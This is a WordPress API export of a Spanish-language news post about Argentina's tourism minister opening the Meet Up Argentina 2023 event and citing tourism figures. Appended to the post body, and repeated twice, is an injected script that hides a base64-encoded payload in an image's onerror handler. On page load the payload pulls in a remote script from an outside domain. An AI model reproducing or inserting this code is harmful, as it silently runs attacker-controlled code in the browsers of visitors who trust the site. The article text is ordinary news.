{"id":2538,"date":"2023-04-20T10:11:49","date_gmt":"2023-04-20T13:11:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2538"},"modified":"2025-08-14T00:18:35","modified_gmt":"2025-08-14T03:18:35","slug":"lammens-en-abril-el-turismo-receptivo-supero-los-numeros-prepandemia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2538","title":{"rendered":"Lammens: \u00abEn abril, el turismo receptivo super\u00f3 los n\u00fameros prepandemia\u00bb"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-color\" style=\"color:#053957\"><em>Acto de apertura de Meet Up Argentina 2023<\/em><\/h3>\n\n\n\n<p>El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, encabez\u00f3 el acto de apertura de Meet Up Argentina 2023, evento l\u00edder en la industria del turismo de reuniones que se lleva adelante en el Centro de Convenciones Buenos Aires.<\/p>\n\n\n\n<p>Durante la jornada, el ministro subray\u00f3: \u201cEn abril, el turismo receptivo super\u00f3 por un 22% los n\u00fameros del mismo mes de 2019. Y a nivel interno, el sector del turismo lider\u00f3 las estad\u00edsticas de generaci\u00f3n de empleo registrado en el \u00faltimo trimestre de 2022, con un 14,9%. Siempre decimos lo mismo: es el resultado del trabajo conjunto entre el sector p\u00fablico y el privado\u201d. Adem\u00e1s, se\u00f1al\u00f3: \u00abLa industria de reuniones es una de las que m\u00e1s demoraron en arrancar dentro del turismo, pero tambi\u00e9n es de las que m\u00e1s vigor e importancia tienen\u00bb.<\/p>\n\n\n\n<p>Participaron del evento la subsecretaria de Promoci\u00f3n Tur\u00edstica, Yanina Mart\u00ednez; el Presidente de la C\u00e1mara Argentina de Turismo, Gustavo Hani; el presidente del Consejo Federal de Turismo, Sebasti\u00e1n Giobellina; la presidenta de la Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y de Bur\u00f3s de Convenciones (AOCA), Patricia Dur\u00e1n Vaca; el Secretario Ejecutivo del INPROTUR, Ricardo Sosa; el presidente del Ente de Turismo de la Ciudad de Buenos Aires, Lucas Delfino; y el presidente de la C\u00e1mara Argentina de Comercio, Natalio Grinman.<\/p>\n\n\n\n<p>Meet Up es uno de los eventos m\u00e1s relevantes de la industria de reuniones en el pa\u00eds y la regi\u00f3n. Esta edici\u00f3n 2023 busca ser el puntapi\u00e9 de la reconversi\u00f3n de la industria de reuniones, en continuidad con una tendencia que se viene marcando en todo el mundo bajo nuevos modelos de negocios.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Acto de apertura de Meet Up Argentina 2023 El ministro de Turismo y Deportes de la Naci\u00f3n, Mat\u00edas Lammens, encabez\u00f3 el acto de apertura de Meet Up Argentina 2023, evento l\u00edder en la industria del turismo de reuniones que se lleva adelante en el Centro de Convenciones Buenos Aires. Durante la jornada, el ministro subray\u00f3: [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2539,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2538","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2538"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2538"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2538\/revisions"}],"predecessor-version":[{"id":7108,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2538\/revisions\/7108"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2539"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2538"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2538"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2538"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}